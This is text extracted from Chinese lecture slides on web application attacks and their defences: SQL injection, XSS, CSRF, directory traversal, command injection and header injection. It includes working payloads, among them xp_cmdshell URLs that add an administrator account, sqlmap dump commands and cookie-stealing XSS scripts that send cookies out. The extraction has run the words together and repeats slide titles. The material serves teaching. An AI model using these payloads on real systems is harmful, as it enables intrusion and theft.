網(wǎng)絡(luò)攻防原理與技術(shù) 第4版 課件 第11章 Web網(wǎng)站攻擊技術(shù)；第12章 社會工程學(xué)；第13章 網(wǎng)絡(luò)防火墻

本PPT是機械工業(yè)出版社出版的教材《網(wǎng)絡(luò)攻防原理與技術(shù)（第3版）》配套教學(xué)PPT（部分內(nèi)容的深度和廣度比教材有所擴展），作者：吳禮發(fā)，洪征，李華波本PPT可能會直接或間接采用了網(wǎng)上資源或公開學(xué)術(shù)報告中的部分PPT頁面、圖片、文字，引用時我們力求在該PPT的備注欄或標(biāo)題欄中注明出處，如果有疏漏之處，敬請諒解。同時對被引用資源或報告的作者表示誠摯的謝意！本PPT可免費使用、修改，使用時請保留此頁。聲明第十一章Web網(wǎng)站攻擊技術(shù)1Web應(yīng)用體系結(jié)構(gòu)脆弱性分析常見Web應(yīng)用攻擊及防范內(nèi)容提綱2Web應(yīng)用防火墻WAF3Web應(yīng)用程序體系結(jié)構(gòu)Web客戶端Web服務(wù)器Web應(yīng)用程序Web應(yīng)用程序Web應(yīng)用程序傳輸層

數(shù)據(jù)庫

連接器

數(shù)據(jù)庫

連接器

IE,Chrome,Firefox,etc.HTTP/HTTPS請求明文或SSLHTTP響應(yīng)(HTML,JavaScript,etc.)

ApacheIISetc.

PerlC++CGIJavaASPPHPetc.

ADOODBCJDBCetc.

OracleSQLServeretc.Web應(yīng)用體系結(jié)構(gòu)潛在弱點Web客戶端活動內(nèi)容執(zhí)行，客戶端軟件漏洞的利用，交互站點腳本的錯誤傳輸偷聽客戶-服務(wù)器通信，SSL重定向Web服務(wù)器Web服務(wù)器軟件漏洞；Web應(yīng)用體系結(jié)構(gòu)潛在弱點Web應(yīng)用程序攻擊授權(quán)、認(rèn)證、站點結(jié)構(gòu)、輸入驗證，以及應(yīng)用程序邏輯數(shù)據(jù)庫通過數(shù)據(jù)庫查詢運行優(yōu)先權(quán)命令，查詢操縱返回額外的數(shù)據(jù)集。Web應(yīng)用程序功能與安全隱患的對應(yīng)關(guān)系Web應(yīng)用安全HTTP協(xié)議是一種簡單的、無狀態(tài)的應(yīng)用層協(xié)議（RFC1945、RFC2616）無狀態(tài)使攻擊變得容易基于ASCII碼，無需弄清復(fù)雜的二進(jìn)制編碼機制，攻擊者就可了解協(xié)議中的明文信息互聯(lián)網(wǎng)中存在的大量中間盒子，HTTP標(biāo)準(zhǔn)(RFC2616和RFC7320)的理解如果不一致，就有可能導(dǎo)致一些新的攻擊發(fā)生HTTP協(xié)議安全問題HTTP會話經(jīng)常被劫持HTTP協(xié)議安全問題HTTP會話頭泄露隱私信息HTTP協(xié)議安全問題中間盒子帶來的HTTP安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題HTTP協(xié)議安全問題為什么需要Cookie？解決無狀態(tài)問題：保存客戶服務(wù)器之間的一些狀態(tài)信息Cookie是指網(wǎng)站為了辨別用戶身份、進(jìn)行會話跟蹤而儲存在用戶本地終端上的一些數(shù)據(jù)（通常經(jīng)過編碼），最早由網(wǎng)景公司的LouMontulli在1993年3月發(fā)明的，后被采納為RFC標(biāo)準(zhǔn)（RFC2109、RFC2965）Cookie的安全問題Cookie的生成與維護由服務(wù)器端生成，發(fā)送給客戶端（一般是瀏覽器），瀏覽器會將Cookie的值保存到某個目錄下的文本文件內(nèi)，下次請求同一網(wǎng)站時就發(fā)送該Cookie給服務(wù)器（前提是瀏覽器設(shè)置為啟用Cookie）服務(wù)器可以利用Cookie存儲信息并經(jīng)常性地維護這些信息，從而判斷在HTTP傳輸中的狀態(tài)Cookie安全問題Cookie的生成與維護Cookie在生成時就會被指定一個Expire值，這就是Cookie的生存周期。到期自動清除如果一臺計算機上安裝了多個瀏覽器，每個瀏覽器都會在各自獨立的空間存放CookieCookie中的內(nèi)容大多數(shù)經(jīng)過了編碼處理Cookie安全問題Cookie的一般格式如下：NAME=VALUE;expires=DATE;path=PATH;domain=DOMAIN_NAME;secure示例autolog=bWlrzTpteXMxy3IzdA%3D%3D;expires=Sat,01-Jan-201800:00:00GMT;path=/;domain=Cookie安全問題Cookie中包含了一些敏感信息，如用戶名、計算機名、使用的瀏覽器和曾經(jīng)訪問的網(wǎng)站等，攻擊者可以利用它來進(jìn)行竊密和欺騙攻擊Cookie安全問題1Web應(yīng)用體系結(jié)構(gòu)脆弱性分析常見Web應(yīng)用攻擊及防范內(nèi)容提綱2Web應(yīng)用防火墻WAF3OWASP十大安全漏洞變遷史OWASPOWASP:OpenWebApplicationSecurityProject，一個全志愿者組成的、非營利性機構(gòu)開發(fā)和出版免費專業(yè)開源的文檔、工具和標(biāo)準(zhǔn)，如：

“TheTenMostCriticalWebApplicationSecurityVulnerabilities”，《AGuidetoBuildingSecureWebApplications》，

WebGoat，WebScarab，各種Web代碼測試工具等OWASPOWASP:OpenWebApplicationSecurityProject，,致力于幫助組織機構(gòu)理解和提高他們的Web安全組織各種Web安全會議2007VS.2004(1/2)OWASPTop102007OWASPTop102004A1.CrossSiteScripting(XSS)A4.CrossSiteScripting(XSS)A2.InjectionFlawsA6.InjectionFlawsA3.MaliciousFileExecution(NEW)A4.InsecureDirectObjectReferenceA2.BrokenAccessControl

(Splitin2007T10)A5.CrossSiteRequestForgery(CSRF)(NEW)A6.InformationLeakageandImproperErrorHandlingA7.ImproperErrorHandlingA7.BrokenAuthenticationandSessionManagementA3.BrokenAuthenticationandSessionManagement2007VS.2004(2/2)OWASPTop102007OWASPTop102004A8.InsecureCryptographicStorageA8.InsecureStorageA9.InsecureCommunications(NEW)A10.FailuretoRestrictURLAccessA2.BrokenAccessControl(splitin2007T10)<removedin2007>A1.Un-validatedInput<removedin2007>A5.BufferOverflows<removedin2007>A9.DenialofService<removedin2007>A10.InsecureConfigurationManagement十大安全漏洞-OWASP2007A1.Injection：注入漏洞；A2.BrokenAuthenticationandSessionManagement：失效的身份認(rèn)證和會話管理；A3.Cross-SiteScripting(XSS)：跨站腳本；A4.InsecureDirectObjectReferences：不安全的直接對象引用；A5.SecurityMisconfiguration：安全配置錯誤；OWASP2013A6.SensitiveDataExposure：敏感數(shù)據(jù)暴露；A7.MissingFunctionLevelAccessControl：功能級別訪問控制缺失；A8.Cross-SiteRequestForgery(CSRF)：跨站請求偽造；A9.UsingKnowVulnerableComponents：使用已知易受攻擊的組件；A10.UnvalidatedRedirectsandForwards未驗證的重定向和轉(zhuǎn)發(fā)OWASP2013OWASP2017OWASP2017OWASP2017OWASP2021一、SQL注入攻擊及防范注入漏洞

Injectionflaws,particularlySQLinjection,arecommoninwebapplications.Injectionoccurswhenuser-supplieddataissenttoaninterpreteraspartofacommandorquery.Theattacker’shostiledatatrickstheinterpreterintoexecutingunintendedcommandsorchangingdata.OWASPDefinition

注入漏洞最普遍的注入漏洞包括：SQL注入：通過SQL語句惡意地調(diào)用后臺數(shù)據(jù)庫系統(tǒng)調(diào)用通過shell命令調(diào)用外部程序任何依賴于解釋執(zhí)行的Web應(yīng)用都有被注入漏洞攻擊的危險！SQL注入原理例子：通過用戶提供的參數(shù)來查詢表中的數(shù)據(jù)"SELECT*FROMUSERSWHERESSN=‘"+ssn+"’“SSN參數(shù)來自于用戶的輸入：參數(shù)未經(jīng)驗證或編碼黑客輸入：1234’OR‘1’=‘1應(yīng)用程序構(gòu)造查詢語句：SELECT*FROMUSERSWHERESSN=‘1234’OR‘1’=‘1’結(jié)果返回數(shù)據(jù)庫中的每一個用戶

永真邏輯！

SQL注入攻擊流程FirewallHardenedOSWebServerAppServerFirewallDatabasesLegacySystemsWebServicesDirectoriesHumanResrcsBillingCustomCodeAPPLICATION

ATTACKNetworkLayerApplicationLayerAccountsFinanceAdministrationTransactionsCommunicationKnowledgeMgmtE-CommerceBus.FunctionsHTTPrequest

SQLquery

DBTable

HTTPresponse

“SELECT*FROMaccountsWHEREacct=‘’OR1=1--’”1.Web程序提供了用戶輸入的表單；2.攻擊者通過填寫表單數(shù)據(jù)發(fā)起攻擊；3.Web程序通過SQL語句的形式將攻擊遞交給數(shù)據(jù)庫；AccountSummaryAcct:5424-6066-2134-4334Acct:4128-7574-3921-0192Acct:5424-9383-2039-4029Acct:4128-0004-1234-02934.數(shù)據(jù)庫執(zhí)行SQL語句，將執(zhí)行結(jié)果加密后返回給應(yīng)用程序；5.應(yīng)用程序解密數(shù)據(jù)，將結(jié)果發(fā)送給用戶（攻擊者）。Account:

SKU:

‘OR1=1--SQL注入示例SQL注入字符串口令可以填寫任意值查詢到的用戶資料靶網(wǎng)網(wǎng)址為54/asd/wyqy/SQL注入：案例在URL鏈接中加入”and1=1”后的返回結(jié)果SQL注入：案例判斷注入權(quán)限是否是sysadmin，注入語句為and1=(selectis_srvrolemember('sysadmin'))SQL注入：案例下面的URL中包含的SQL語句用來增加一個名為test用戶（口令也為test）。返回結(jié)果如圖10-6所示。54/asd/wyqy/shownews.asp?id=51;execmaster..xp_cmdshell'netusertesttest/add'--SQL注入：案例下面，將增加的test用戶加入到管理員組。URL鏈接為54/asd/wyqy/shownews.asp?id=51;execmaster..xp_cmdshell'netlocalgroupadministratorstest/add'--，返回結(jié)果如圖10-7所示。從圖中可以看出，頁面正常返回，說明添加成功。SQL注入：案例一般來說，只要是帶有參數(shù)的動態(tài)網(wǎng)頁且此網(wǎng)頁訪問了數(shù)據(jù)庫，那么該頁面就有可能存在SQL注入漏洞。如果程序員安全意識不強，沒有過濾輸入的一些特殊字符，則存在SQL注入的可能性就非常大。在探測過程中，需要分析服務(wù)器返回的詳細(xì)錯誤信息。而在默認(rèn)情況下，瀏覽器僅顯示“HTTP500服務(wù)器錯誤”，并不顯示詳細(xì)的錯誤信息。為此，需要調(diào)整IE瀏覽器的配置，即把IE菜單【工具】中【Internet選項】下的高級選項中的【顯示友好HTTP錯誤信息】前面的勾去掉。SQL注入：檢測在形如http://xxx.xxx.xxx/abc.asp?id=XX的帶有參數(shù)的ASP動態(tài)網(wǎng)頁中，XX為參數(shù)。參數(shù)的個數(shù)和類型取決于具體的應(yīng)用。參數(shù)的類型可以是整型或者字符串型。下面我們以http://xxx.xxx.xxx/abc.asp?id=YY為例進(jìn)行分析1、整型參數(shù)時的SQL注入漏洞探測2、字符串型參數(shù)時的SQL注入漏洞探測3、特殊情況的處理SQL注入：檢測Sqlmap1.檢測注入點是否可用：sqlmap.py-u2/nanfang/ProductShow.asp?ID=56Sqlmap2.列出數(shù)據(jù)庫表：sqlmap.py-u"2/nanfang/ProductShow.asp?ID=56"–tablesSqlmap3.列出指定表中的字段：sqlmap.py-u"2/nanfang/ProductShow.asp?ID=56"-Tadmin–columnsSqlmap4.列出表記錄：sqlmap.py-u"2/nanfang/ProductShow.asp?ID=56"-Tadmin-C"id,data,username,password"–dumpSqlmap5.驗證結(jié)果：從圖10-12所示的結(jié)果可以發(fā)現(xiàn)其中的一個用戶信息為：

id：1

username:admin

password:3acdbb255b45d296通過md5反查(/)，得到該password散列的原文密碼為”0791idc”。拿到管理員賬號密碼直接成功登錄網(wǎng)站后臺Sqlmap防御注入漏洞使用特定語言的庫函數(shù)來代替shell命令和系統(tǒng)調(diào)用；對用戶輸入的信息進(jìn)行嚴(yán)格檢查和過濾：數(shù)據(jù)類型（字符串、整數(shù)等）正確嗎？使用的是允許的字符集嗎？輸入滿足格式要求嗎？……使用“最小權(quán)限”限制數(shù)據(jù)庫用戶的權(quán)限二、跨站腳本攻擊及防范(一)跨站腳本（XSS）漏洞Cross-SiteScripting(XSS)flawsoccurwheneveranapplicationtakesusersupplieddataandsendsittoawebbrowserwithoutfirstvalidatingorencodingthatcontent.XSSallowsattackerstoexecutescriptinthevictim'sbrowserwhichcanhijackusersessions,defacewebsites,possiblyintroduceworms,etc.OWASPDefinition

跨站腳本攻擊工作原理：輸入插入包含有JavaScript或其它惡意腳本的HTML標(biāo)簽代碼。問題根源：不當(dāng)?shù)姆?wù)器端輸入檢查，從而允許用戶輸入可被客戶端瀏覽器解釋的腳本命令。XSS是最普遍的Web程序安全問題。嵌入JavaScript腳本的例子：<script>window.open(/info.pl?document.cookie</script>XSS攻擊的原理帶有XSS漏洞的Web程序攻擊者將惡意腳本輸入到服務(wù)器上的Web頁面攻擊者設(shè)置陷阱12受害者瀏覽頁面3腳本將受害者的Session、Cookie發(fā)送給攻擊者運行于受害者瀏覽器的腳本可以完全訪問DOM和cookiesCustomCodeAccountsFinanceAdministrationTransactionsCommunicationKnowledgeMgmtE-CommerceBus.FunctionsXSS漏洞探測示例“Search”框內(nèi)的文本信息常會反饋回用戶頁面<script>alert(document.cookie)</script>

腳本執(zhí)行并將Session信息通過對話框顯示出來攻擊測試腳本儲存式跨站腳本攻擊，也稱為持久性跨站腳本攻擊。如果Web程序允許存儲用戶數(shù)據(jù)，并且存儲的輸入數(shù)據(jù)沒有經(jīng)過正確的過濾，就有可能發(fā)生這類攻擊。在這種攻擊模式下，攻擊者并不需要利用一個惡意鏈接，只要用戶訪問了儲存式跨站腳本網(wǎng)頁，那么惡意數(shù)據(jù)就將顯示為網(wǎng)站的一部分并以受害者身份執(zhí)行。儲存式XSS儲存式XSS儲存式XSS儲存式<script>window.location="/steal.cgi?ck="+document.cookie;</script>~留言版~<script>window.location="/steal.cgi?ck="+document.cookie;</script>也稱為非持久性跨站腳本攻擊，是一種最常見的跨站腳本攻擊類型。與本地腳本漏洞不同的是Web客戶端使用Server端腳本生成頁面為用戶提供數(shù)據(jù)時，如果未經(jīng)驗證的用戶數(shù)據(jù)被包含在頁面中而未經(jīng)HTML實體編碼，客戶端代碼便能夠注入到動態(tài)頁面中。在這種攻擊模式下，Web程序不會存儲惡意腳本，它會將未經(jīng)驗證的數(shù)據(jù)通過請求發(fā)送給客戶端，攻擊者就可以構(gòu)造惡意的URL鏈接或表單并誘騙用戶訪問，最終達(dá)到利用受害者身份執(zhí)行惡意代碼的目的。反射式XSS(1)Alice經(jīng)常瀏覽Bob建立的網(wǎng)站。Bob的站點運行Alice使用用戶名/密碼進(jìn)行登錄，并存儲敏感信息(比如銀行帳戶信息)；(2)Charly發(fā)現(xiàn)Bob的站點包含反射性的XSS漏洞；(3)Charly編寫一個利用漏洞的URL，并將其冒充為來自Bob的郵件發(fā)送給Alice；(4)Alice在登錄到Bob的站點后，瀏覽Charly提供的URL；(5)嵌入到URL中的惡意腳本在Alice的瀏覽器中執(zhí)行，就像它直接來自Bob的服務(wù)器一樣。此腳本盜竊敏感信息(授權(quán)、信用卡、帳號信息等)，然后在Alice完全不知情的情況下將這些信息發(fā)送到Charly的Web站點。反射式XSS反射式XSSloginsb.asp直接向用戶顯示msg參數(shù)，這樣只要簡單構(gòu)造一個惡意的url就可以觸發(fā)一次XSS。反射式XSSDOM式XSS如果構(gòu)造數(shù)據(jù)“‘onclick=’javascript:alert(/xss/)”，那么最后添加的html代碼就變成了“<ahref=’‘onclick=’javascript:alert(/xss/)’>test</a>”，插入一個onclick事件，點擊提交按鍵，那么就會發(fā)生一次DOM式xss攻擊。DOM式XSS防御XSS攻擊對Web應(yīng)用程序的所有輸入進(jìn)行過濾，對危險的HTML字符進(jìn)行編碼：‘<’,‘>’

‘<’,‘>’‘(‘,‘)’

‘(’,‘)’‘#‘,‘&’

‘#’,‘&‘對用戶進(jìn)行培訓(xùn)，告知小心使用電子郵件消息或即時消息中的鏈接；防止訪問已知的惡意網(wǎng)站；執(zhí)行手工或自動化代碼掃描，確定并消除潛在的XSS漏洞。三、Cookie欺騙及防范偽造Cookie信息，繞過網(wǎng)站的驗證過程，不需要輸入密碼，就可以登錄網(wǎng)站，甚至進(jìn)入網(wǎng)站管理后臺偽造Cookie信息網(wǎng)站登錄驗證代碼偽造Cookie信息利用request.Cookies語句分別獲取Cookies中的用戶名、口令和randomid的值。如果用戶名或口令為空或randomid值不等于12就跳轉(zhuǎn)到登錄界面。也就是說，程序是通過驗證用戶的Cookie信息來確認(rèn)用戶是否已登錄。然而，Cookie信息是可以在本地修改的，只要改后的Cookie信息符合驗證條件（用戶名和口令不空且randomid值等于12），就可進(jìn)入管理后臺界面判斷是否有刪帖權(quán)限的代碼偽造Cookie信息只要Cookie中的power值不小于500，任意用戶都可以刪除任意帖子。同樣可以利用上面介紹的方法進(jìn)行Cookie欺騙攻擊面上面介紹的兩個攻擊例子之所以成功，是因為在Cookie中保存了用戶名、口令以及權(quán)限信息而留下了安全隱患。安全原則：一般情況下，網(wǎng)站會話管理機制僅將會話ID保存至Cookie，而將數(shù)據(jù)本身保存在Web服務(wù)器的內(nèi)存或文件、數(shù)據(jù)庫中偽造Cookie信息如果Cookie中沒有設(shè)置安全屬性secure”，則Cookie內(nèi)容在網(wǎng)絡(luò)中用明文傳輸，攻擊者監(jiān)聽到Cookie內(nèi)容后可以輕松實現(xiàn)會話劫持為什么會不設(shè)置安全屬性監(jiān)聽Cookie來實現(xiàn)會話劫持四、CSRF攻擊及防范跨站請求仿冒ACSRF(CrossSiteRequestForgery)attackforcesalogged-onvictim’sbrowsertosendapre-authenticatedrequesttoavulnerablewebapplication,whichthenforcesthevictim’sbrowsertoperformahostileactiontothebenefitoftheattacker.OWASPDefinition

CSRF用戶C網(wǎng)站A：存在CSRF漏洞的網(wǎng)站網(wǎng)站B：惡意攻擊者用戶C：受害者網(wǎng)站A（受信任）網(wǎng)站B（惡意）6.由于瀏覽器會帶上用戶C的cookie，網(wǎng)站A不知道步驟5的請求是B發(fā)出的，因此網(wǎng)站A會根據(jù)用戶C的權(quán)限處理步驟5的的請求，這樣就達(dá)到了偽造用戶C請求的目的1.用戶C瀏覽并登錄正常網(wǎng)站A2.驗證通過，瀏覽器生成網(wǎng)站A的cookie3.用戶C在沒有登錄退出網(wǎng)站A的情況下，訪問惡意網(wǎng)站B4.網(wǎng)站B要求訪問第三方網(wǎng)站A5.根據(jù)B在步驟4的要求，瀏覽器帶著步驟2處產(chǎn)生的cookie訪問網(wǎng)站A現(xiàn)在絕大多數(shù)網(wǎng)站都不會使用GET請求來進(jìn)行數(shù)據(jù)更新，而是采用POST來提交，即使這樣，攻擊者仍然能夠?qū)嵤〤SRF攻擊CSRF防御CSRF攻擊現(xiàn)有銀行的網(wǎng)銀交易流程要比例子復(fù)雜得多，同時還需要USBkey、驗證碼、登錄密碼和支付密碼等一系列安全信息，一般并不存在CSRF安全漏洞，安全是有保障的。CSRF與XSS重大的差別：CSRF利用的是Web服務(wù)器端的漏洞XSS利用的是Web客戶端的漏洞XSS攻擊是實施CSRF攻擊前的一個重要步驟：攻擊者通過XSS攻擊獲取有用的攻擊信息，比如通過XSS偽造一個提示用戶輸入身份信息的表單。防御CSRF攻擊設(shè)定短暫的可信用戶會話時間，完成任務(wù)后記得退出可信會話，刪除所有cookie；每次提出一個可信行為時，對發(fā)出請求的用戶進(jìn)行驗證；讓網(wǎng)站記住登錄用戶名和密碼時要小心。留在客戶端的登錄信息可能會攻擊者加以利用；在URL和表單中增加的每個請求，必須提供基本會話令牌以外的每個請求用戶驗證；從Web應(yīng)用程序中刪除所有XSS漏洞。防御CSRF攻擊五、目錄遍歷及其防范許多Web應(yīng)用支持外界以參數(shù)的形式來指定服務(wù)器上的文件名，如果服務(wù)器在處理用戶請求時不對文件名進(jìn)行充分校驗，就可能出問題，如：文件被非法獲取，導(dǎo)致重要信息被泄露；文件被篡改，如篡改網(wǎng)頁內(nèi)容以發(fā)布不實消息，設(shè)置圈套將用戶誘導(dǎo)至惡意網(wǎng)站，篡改腳本文件從而在服務(wù)器上執(zhí)行任意腳本等；文件被刪除，如刪除腳本文件或配置文件導(dǎo)致服務(wù)器宕機等目錄遍歷一般來說，如果Web應(yīng)用滿足以下3個條件時，就有可能產(chǎn)生目錄遍歷漏洞外界能夠指定文件名能夠使用絕對路徑或相對路徑等形式來指定其它目錄的文件名沒有對拼接后的文件名進(jìn)行校驗就允許訪問該文件目錄遍歷目錄遍歷/example/ex.php?template=../../../../etc/hosts%00將顯示/etc/hosts文件內(nèi)容目錄遍歷/online/getnews.asp?item=20March2007.html/online/getnews.asp?item=../../../../windows/win.ini提交申請獲取某個新聞網(wǎng)頁文件

使用../從當(dāng)前目錄跳到上一級目錄

目錄遍歷成功將讀取到windows目錄下的win.ini文件

避免由外界指定文件名將文件名固定，保存在會話變量中，不直接指定文件名，而是使用編號等方法間接指定文件名中不允許包含目錄名不同系統(tǒng)中表示目錄的字符有所不同，常見的有：/、\、:等限定文件中僅包含字母或數(shù)字有些攻擊使用不同的編碼轉(zhuǎn)換進(jìn)行過濾性的繞過，如通過對參數(shù)進(jìn)行URL編碼來繞過檢查目錄遍歷防御downfile.jsp?filename=%66%61%6E%2E%70%64%66六、操作系統(tǒng)命令注入及防范很多Web應(yīng)用編程語言支持應(yīng)用通過Shell執(zhí)行操作系統(tǒng)（OS）命令。通過Shell執(zhí)行OS命令，或開發(fā)中用到的某個方法在其內(nèi)部使用了Shell，就有可能出現(xiàn)惡意利用Shell提供的功能來任意執(zhí)行OS命令的情況，這就是OS命令注入OS命令注入OS命令注入上述攻擊成功的主要原因是Shell支持連續(xù)執(zhí)行多條命令，如Unix操作系統(tǒng)Shell中使用分號（;）或管道（|）等字符支持連續(xù)執(zhí)行多條命令，Windows操作系統(tǒng)cmd.exe使用&符號來連接多條命令。這些符號一般稱為Shell的元字符，如果OS命令參數(shù)中混入了元字符，就會使攻擊者添加的操作系統(tǒng)命令被執(zhí)行，這就是OS注入漏洞產(chǎn)生的原因OS命令注入OS命令注入攻擊的一般流程為：從外部下載攻擊用軟件；對下載來的軟件授予執(zhí)行權(quán)限；從內(nèi)部攻擊操作系統(tǒng)漏洞以取得管理員權(quán)限；攻擊者在Web服務(wù)器上執(zhí)行攻擊操作，如：瀏覽、篡改或刪除Web服務(wù)器內(nèi)的文件，對外發(fā)送郵件，以此服務(wù)器作跳板攻擊其他服務(wù)器等。OS命令注入OS命令注入攻擊防御策略：選擇不調(diào)用操作系統(tǒng)命令的實現(xiàn)方法，即不調(diào)用Shell功能，而用其它方法實現(xiàn)；避免使用內(nèi)部可能會調(diào)用Shell的函數(shù)；不將外部輸入的字符串作為命令行參數(shù)；使用安全的函數(shù)對傳遞給操作系統(tǒng)的參數(shù)進(jìn)行轉(zhuǎn)義，消除Shell元字符帶來的威脅。由于Shell轉(zhuǎn)義規(guī)則的復(fù)雜性以及其它一些環(huán)境相關(guān)的原因，這一方法有時很難完全湊效。OS命令注入防御七、HTTP消息頭注入攻擊及防范指在重定向或生成Cookie時，基于外部傳入的參數(shù)生成HTTP響應(yīng)頭：HTTP響應(yīng)頭信息一般以文本格式逐行定義消息頭，即消息頭之間互相以換行符隔開。攻擊者可以利用這一特點，在指定重定向目標(biāo)URL或Cookie值的參數(shù)中插入換行符且該換行符又被直接作為響應(yīng)輸出，從而在受害者的瀏覽器上任意添加響應(yīng)消息頭或偽造響應(yīng)消息體：生成任意Cookie，重定向到任意URL，更改頁面顯示內(nèi)容，執(zhí)行任意JavaScript而造成與XSS同樣效果HTTP消息頭注入看下面的例子HTTP消息頭注入/web/in.cfg?url=/%0D%0ALocation:+http://trap.com/web/attack.php執(zhí)行之后，瀏覽器會跳轉(zhuǎn)到惡意網(wǎng)站/web/attack.php，而不是期望的正常網(wǎng)站。造成這一結(jié)果的主要原因是，CGI腳本里使用的查詢字符串url中包含了換行符（%0D%0A）。出兩個消息頭：

Location:Location:/web/attack.php采用類似方法可以生成任意Cookie，看下面例子HTTP消息頭注入/web/in.cfg?url=/web/exampple.php%0D%0ASet-Cookie:+SESSID=ac13rkd90執(zhí)行之后，兩個消息頭：

Set-Cookie:SESSID=ac13rkd90Location:/web/exampple.php不將外部傳入?yún)?shù)作為HTTP響應(yīng)消息頭輸出，如不直接使用URL指定重定向目標(biāo)，而是將其固定或通過編號等方式來指定，或使用Web應(yīng)用開發(fā)工具中提供的會話變量來轉(zhuǎn)交URL；由專門的API來進(jìn)行重定向或生成Cookie，并嚴(yán)格檢驗生成消息頭的參數(shù)中的換行符HTTP消息頭注入防御八、其它攻擊1、惡意文件執(zhí)行Codevulnerabletoremotefileinclusion(RFI)allowsattackerstoincludehostilecodeanddata,resultingindevastatingattacks,suchastotalservercompromise.MaliciousfileexecutionattacksaffectPHP,XMLandanyframeworkwhichacceptsfilenamesorfilesfromusers.OWASPDefinition

1、惡意文件執(zhí)行惡意文件執(zhí)行漏洞也稱為不安全的遠(yuǎn)程文件包含漏洞；需要用戶提供輸入文件名的Web程序容易受到攻擊：如果對用戶輸入不驗證，攻擊者可借此操控Web程序執(zhí)行系統(tǒng)程序或外部URL；允許上傳文件給Web程序帶來的危害更大可以將可執(zhí)行代碼放置到Web應(yīng)用中去；可以替換Session文件、日志文件或認(rèn)證令牌1、防御惡意文件執(zhí)行漏洞禁止用戶輸入被用作輸入文件片斷；對于必須要用戶輸入文件名、URL的地方，執(zhí)行嚴(yán)格的檢查驗證輸入合法性；文件上傳的處理要非常小心：文件只允許上傳到webroot目錄以外的目錄中，這樣能防止文件被執(zhí)行；限制或隔離Web程序?qū)ξ募脑L問權(quán)限。2、不安全的直接對象引用Adirectobjectreferenceoccurswhenadeveloperexposesareferencetoaninternalimplementationobject,suchasafile,directory,databaserecord,orkey,asaURLorformparameter.Attackerscanmanipulatethosereferencestoaccessotherobjectswithoutauthorization.OWASPDefinition

2、不安全的直接對象引用不安全的直接對象引用漏洞也常稱為目錄遍歷漏洞；Web程序常常會暴露內(nèi)部對象，包括：文件或目錄URL數(shù)據(jù)庫口令數(shù)據(jù)庫的一些對象名稱，比如表名如果訪問控制配置不合理，攻擊者就可以不經(jīng)授權(quán)地操作這些暴露的內(nèi)部對象。2、防御不安全的直接對象引用鎖定Web目錄。使得通過網(wǎng)絡(luò)訪問Web服務(wù)器的用戶都不能訪問除專門用于存放Web內(nèi)容的目錄以外的目錄；對于每一次對象引用都要重新驗證授權(quán)；禁止通過參數(shù)暴露內(nèi)部對象；建議使用間接映射的方法取代簡單的直接對象引用，比如：/application?file=1

3、信息泄露和不當(dāng)?shù)腻e誤處理

Applicationscanunintentionallyleakinformationabouttheirconfiguration,internalworkings,orviolateprivacythroughavarietyofapplicationproblems.Attackersusethisweaknesstostealsensitivedataorconductmoreseriousattacks.OWASPDefinition

3、信息泄露和不當(dāng)?shù)腻e誤處理敏感信息泄露常常細(xì)微難以察覺！常見的脆弱點：堆棧跟蹤信息SQL狀態(tài)信息登錄失敗信息授權(quán)信息4、不當(dāng)?shù)腻e誤處理示例MicrosoftOLEDBProviderforODBCDriverserror'80004005'[Microsoft][ODBCMicrosoftAccess97Driver]Can'topendatabase‘VDPROD'.java.sql.SQLException:ORA-00600:internalerrorcode,arguments:[ttcgnd-1],[0],[],[],[],atoracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:169)atoracle.jdbc.ttc7.TTIcessError(TTIoer.java:208)示例1：示例2：錯誤處理信息對于Debug非常有用，但是為攻擊者提供了太多潛在可用的攻擊信息！4、防御信息泄露每個應(yīng)用程序都應(yīng)包含一個標(biāo)準(zhǔn)的錯誤處理框架來處理異常：禁止顯示堆棧跟蹤、數(shù)據(jù)庫訪問、協(xié)議等相關(guān)的信息；Web程序應(yīng)只提供盡量簡短、“剛好夠用”的錯誤處理信息給用戶；5、認(rèn)證和會話管理不完善

Accountcredentialsandsessiontokensareoftennotproperlyprotected.Attackerscompromisepasswords,keys,orauthenticationtokenstoassumeotherusers’identities.OWASPDefinition

會話(Session)管理HTTP/HTTPS是“無狀態(tài)”協(xié)議意味著每一次用戶請求都需要認(rèn)證會話管理解決了這樣的問題：當(dāng)一個用戶得到服務(wù)器認(rèn)證后，服務(wù)器如何識別和處理這個認(rèn)證用戶接下來的請求Web程序一般會提供內(nèi)置的會話跟蹤方法，方便用戶的使用；Web開發(fā)者常采用自己的策略來實現(xiàn)會話狀態(tài)管理，可能會犯錯誤而導(dǎo)致安全問題。會話管理：SessionID唯一地標(biāo)識用戶一個ID僅用于一次認(rèn)證會話由服務(wù)器生成以如下的形式發(fā)送給客戶端：隱式變量HTTPcookieURL查詢串服務(wù)器期待用戶在下一次請求時發(fā)送同樣的ID（用來標(biāo)識用戶已被認(rèn)證）會話管理：SessionHijackingSessionID可能被泄露和猜解，黑客可以：獲取用戶的帳號做任何受害者能做的事情：一個使用同樣SessionID的攻擊者將擁有和真正用戶相同的特權(quán)。認(rèn)證和會話管理攻擊流程CustomCodeAccountsFinanceAdministrationTransactionsCommunicationKnowledgeMgmtE-CommerceBus.Functions1用戶發(fā)送認(rèn)證信息2站點進(jìn)行URL重寫(i.e.,把session放到URL中)3用戶在一個論壇中點擊了

這個鏈接?JSESSIONID=9FA1DB9EA...4黑客在

的日志文件中得到用戶的JSESSIONID值5黑客使用JSESSIONID獲取到受害者的帳號5、防御會話管理攻擊使用長且復(fù)雜的隨機SessionID，難以猜解；對SessionID的傳輸、存儲進(jìn)行保護，防止被泄露和劫持；使用SSL時，必須保護認(rèn)證和SessionID兩部分的內(nèi)容；URL查詢字符串中不要包含有User/Session任何信息。6、不安全的加密存儲

Webapplicationsrarelyusecryptographicfunctionsproperlytoprotectdataandcredentials.Attackersuseweaklyprotecteddatatoconductidentitytheftandothercrimes,suchascreditcardfraud.OWASPDefinition

